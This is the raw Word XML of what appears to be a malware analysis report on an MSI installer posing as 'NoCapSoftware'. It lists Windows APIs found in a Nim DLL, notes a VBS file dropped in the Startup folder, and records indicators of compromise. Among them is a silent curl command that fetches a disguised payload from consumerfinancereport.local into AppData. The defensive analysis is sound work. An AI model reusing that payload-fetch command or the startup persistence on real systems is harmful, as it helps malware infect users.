      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves the process identifier (ID) for the current process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D1713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VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Reserves or commits a region of memory in the address space of a specified process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB1FA6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VirtualProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Changes the protection on a region of committed pages in the virtual address space of a specified process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395A04F0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GetCurrentProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves a pseudo-handle for the current process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C38AA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GetCurrentThreadId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves the thread identifier of the calling thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3196A48E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RtlAddFunctionTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Adds a function table entry to the dynamic function table maintained by the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B33AA68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lastRenderedPageBreak/>
        <w:t>RtlLookupFunctionEntry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves the function table entry for a specified address in a function table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D5B49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TerminateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: Terminates the specified process and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> its threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6943AA9A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DeleteCriticalSection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Releases all resources used by an unowned critical section object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4C0CB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EnterCriticalSection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Waits for ownership of the specified critical section object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F950656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InitializeCriticalSection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Initializes a critical section object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5320DBDF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LeaveCriticalSection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Releases ownership of the specified critical section object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9FD08E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GetTickCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves the number of milliseconds that have elapsed since the system was started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410A98F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QueryPerformanceCounter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves the current value of the performance counter, which is a high-resolution timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45A1D9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RtlVirtualUnwind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Unwinds the specified portion of the call stack for a specified target function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605EE5EF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VirtualFree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Frees or decommits the specified region of memory within the virtual address space of a specified process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7F571" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>VirtualQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Retrieves information about a range of pages in the virtual address space of a specified process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B38FF6" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CFCE13" w14:textId="553C4F1B" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>From the extracted strings we see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10216740" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NimMain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C82CC80" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">functions like: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdlib_dollars.nim.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="215BC225" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1" w:rsidP="008945B1">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from what seen for this file, is that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> downloaded as an image but exported/used as a DLL and looking at the APIs: These APIs are building blocks for creating, managing, and interacting with processes, memory, and system resources on the Windows platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A155F7" w14:textId="70EC4AED" w:rsidR="00F54E18" w:rsidRPr="0039074F" w:rsidRDefault="00F54E18" w:rsidP="001F1D58">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43285EDF" w14:textId="3F55E01E" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc159205437"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Basic Dynamic Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4458BC13" w14:textId="64D3E04D" w:rsidR="00551809" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00551809">
      <w:r>
        <w:t>{Screenshots and description about basic dynamic artifacts and methods}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C83B8E3" w14:textId="77777777" w:rsidR="00551809" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00551809"/>
    <w:p w14:paraId="15EA6B65" w14:textId="2EB3EEBA" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>look</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like a normal MSI file, and at the end it has a shortcut in the Desktop for the result software:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18344280" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008945B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759CCC0E" wp14:editId="1E5D663A">
            <wp:extent cx="921385" cy="1439545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="2081804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1E05" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2CB5F3" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When running it, it shows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D707CE1" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F292105" wp14:editId="7E2BDCC8">
            <wp:extent cx="3889375" cy="3056890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102137815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7815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4386" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE41D20" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a folder names </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NoCapSoftware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in program Files, so far it looks legit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219B7DD" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1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E78A655" wp14:editId="07118CE2">
            <wp:extent cx="5943600" cy="1548130"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8106609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6093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CFFEA0" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240BAB92" w14:textId="14883FB4" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>From PROCMON</w:t>
      </w:r>
      <w:r w:rsidR="00D347A0">
        <w:t xml:space="preserve"> searching for (msiexec.exe)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842003F" w14:textId="77777777" w:rsidR="00072DA2" w:rsidRDefault="00072DA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704A4139" w14:textId="09B60ACC" w:rsidR="00072DA2" w:rsidRDefault="00072DA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We see there is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StartUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB5430" w14:textId="09694449" w:rsidR="00072DA2" w:rsidRDefault="00072DA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2769D7DB" wp14:editId="442B62CF">
            <wp:extent cx="5943600" cy="144145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="10261925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ode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>\Users\howl\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A650BDC" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We see that its writing in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/roaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120F9A92" w14:textId="77777777" w:rsidR="008945B1" w:rsidRDefault="008945B1">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343AE95D" w14:textId="2B41AFFA" w:rsidR="008945B1" w:rsidRDefault="002E356E">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EB8D225" wp14:editId="23B6EEB7">
            <wp:extent cx="5943600" cy="1003935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="99718275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8275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CC90" w14:textId="77777777" w:rsidR="00072DA2" w:rsidRDefault="008945B1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47E7C09" wp14:editId="701E10DB">
            <wp:extent cx="5943600" cy="3655060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="69859451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9451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D959" w14:textId="77777777" w:rsidR="00072DA2" w:rsidRDefault="00072DA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6038FFF1" w14:textId="77777777" w:rsidR="00072DA2" w:rsidRDefault="00072DA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>It is then trying to look for a driver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8BF9A" w14:textId="17A60EB3" w:rsidR="00F54E18" w:rsidRDefault="00072DA2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3CF7F470" wp14:editId="098F7A35">
            <wp:extent cx="5943600" cy="203835"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="20425483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E18">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F82300" w14:textId="2F50CC34" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc159205438"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced Static Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0E3AC0EF" w14:textId="473F65A5" w:rsidR="00510367" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00510367">
      <w:r>
        <w:t>{Screenshots and description about findings during advanced static analysis}</w:t>
      </w:r>
      <w:r w:rsidR="00510367" w:rsidRPr="00510367">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F6CBE">
        <w:t xml:space="preserve">Could not found something </w:t>
      </w:r>
      <w:r w:rsidR="00510367">
        <w:t>useful with the running Cutter for the PE file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD2EF2" w14:textId="7F0844BF" w:rsidR="00551809" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00551809"/>
    <w:p w14:paraId="49B6C5C0" w14:textId="77777777" w:rsidR="00551809" w:rsidRPr="00551809" w:rsidRDefault="00551809" w:rsidP="00551809"/>
    <w:p w14:paraId="0DE02AD8" w14:textId="44EDE1D5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52DD841C" w14:textId="549AC297" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc159205439"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced Dynamic Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7F563705" w14:textId="3CA58737" w:rsidR="007F6CBE" w:rsidRPr="00551809" w:rsidRDefault="007F6CBE" w:rsidP="007F6CBE">
      <w:r>
        <w:t xml:space="preserve">Could not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>found</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> something useful with the running </w:t>
      </w:r>
      <w:r>
        <w:t>DBG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the PE file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2989AA3D" w14:textId="77777777" w:rsidR="007F6CBE" w:rsidRPr="00551809" w:rsidRDefault="007F6CBE" w:rsidP="007F6CBE"/>
    <w:p w14:paraId="1351E353" w14:textId="25B37F5E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21742E54" w14:textId="7772CF09" w:rsidR="00F54E18" w:rsidRDefault="00F54E18" w:rsidP="00F54E18">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc159205440"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Indicators of Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0A7D771F" w14:textId="47112F0B" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="0000714D">
      <w:r>
        <w:t>The full list of IOCs can be found in the Appendices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7946A351" w14:textId="25F450F7" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="0000714D"/>
    <w:p w14:paraId="28D2D4FF" w14:textId="3B41F621" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="0000714D"/>
    <w:p w14:paraId="6C8C325E" w14:textId="2A7EB3E7" w:rsidR="0000714D" w:rsidRDefault="0000714D" w:rsidP="0000714D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc159205441"/>
      <w:r>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="0005795C">
        <w:t>Indicators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="424E7A20" w14:textId="04EE8D09" w:rsidR="0000714D" w:rsidRDefault="0005795C" w:rsidP="0000714D">
      <w:r>
        <w:t>{Description of network indicators}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EB9F6" w14:textId="77777777" w:rsidR="0000714D" w:rsidRPr="0000714D" w:rsidRDefault="0000714D" w:rsidP="0000714D"/>
    <w:p w14:paraId="7537C30D" w14:textId="13B2F1FB" w:rsidR="00551809" w:rsidRDefault="004F5C5F" w:rsidP="00551809">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4655FFCB" wp14:editId="0B2E8BB9">
            <wp:extent cx="5943600" cy="2560320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13058141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B4E0" w14:textId="6A33507D" w:rsidR="00551809" w:rsidRDefault="00551809" w:rsidP="00551809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Fig 3: </w:t>
      </w:r>
      <w:r w:rsidR="004F5C5F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F5C5F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PROCMON:curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F5C5F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D5B72" w14:textId="77777777" w:rsidR="004F5C5F" w:rsidRDefault="004F5C5F" w:rsidP="004F5C5F">
      <w:pPr>
        <w:pStyle w:val="graf"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C:\Windows\system32\curl -s -o C:\Users\howl\AppData\Roaming\oneWitch.png </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>consumerfinancereport.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/blog/index/witchABy.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDE422F" w14:textId="77777777" w:rsidR="004F5C5F" w:rsidRDefault="004F5C5F" w:rsidP="00551809">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B47D3D" w14:textId="77777777" w:rsidR="004F5C5F" w:rsidRDefault="004F5C5F" w:rsidP="00551809">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3845AE57" w14:textId="4DC33DE8" w:rsidR="0000714D" w:rsidRPr="00551809" w:rsidRDefault="0000714D" w:rsidP="00551809">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0000714D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41816321" w14:textId="1BC4C0CF" w:rsidR="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B21911" w14:textId="77777777" w:rsidR="00FD5381" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15535748" w14:textId="77777777" w:rsidR="00FD5381" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4466CF09" w14:textId="77777777" w:rsidR="00FD5381" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622823E8" w14:textId="77777777" w:rsidR="00FD5381" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9FD990" w14:textId="77777777" w:rsidR="00FD5381" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6625742D" w14:textId="467B7F3D" w:rsidR="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc159205442"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host-based Indicators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="62B08430" w14:textId="28CC0AE4" w:rsidR="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C"/>
    <w:p w14:paraId="36934D32" w14:textId="2D468FA3" w:rsidR="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C">
      <w:r>
        <w:t>{Description of host-based indicators}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CAA46C" w14:textId="0701369C" w:rsidR="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C"/>
    <w:p w14:paraId="5498C2B5" w14:textId="77777777" w:rsidR="0005795C" w:rsidRPr="0005795C" w:rsidRDefault="0005795C" w:rsidP="0005795C"/>
    <w:p w14:paraId="0D76B25A" w14:textId="77777777" w:rsidR="00617841" w:rsidRDefault="00FD5381" w:rsidP="0005795C">
      <w:pPr>
        <w:spacing w:after="160" w:line="259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69A937" wp14:editId="5594C640">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>702758</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>469677</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2804400" cy="5760"/>
                <wp:effectExtent l="76200" t="152400" r="110490" b="165735"/>
                <wp:wrapNone/>
                <wp:docPr id="214287867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044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AC6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51.1pt;margin-top:28.5pt;width:229.3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18B0DE" wp14:editId="4ADE10B5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1126118</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2761077</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1056960" cy="34200"/>
                <wp:effectExtent l="95250" t="152400" r="124460" b="156845"/>
                <wp:wrapNone/>
                <wp:docPr id="14255458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69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61502" id="Ink 16" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:84.4pt;margin-top:208.9pt;width:91.75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D43B17" wp14:editId="4433C0C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1166438</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2631477</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1200240" cy="14400"/>
                <wp:effectExtent l="76200" t="133350" r="114300" b="157480"/>
                <wp:wrapNone/>
                <wp:docPr id="47708562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00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E367A" id="Ink 15" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:87.65pt;margin-top:198.7pt;width:103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0E15C3" wp14:editId="10766D27">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1057358</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2481357</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1192680" cy="75960"/>
                <wp:effectExtent l="95250" t="152400" r="140970" b="153035"/>
                <wp:wrapNone/>
                <wp:docPr id="147930771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926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978F" id="Ink 14" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:79.05pt;margin-top:186.9pt;width:102.4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">
                <v:imagedata r:id="rId3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9B5C9F" wp14:editId="2BF53738">
            <wp:extent cx="5943600" cy="3655060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
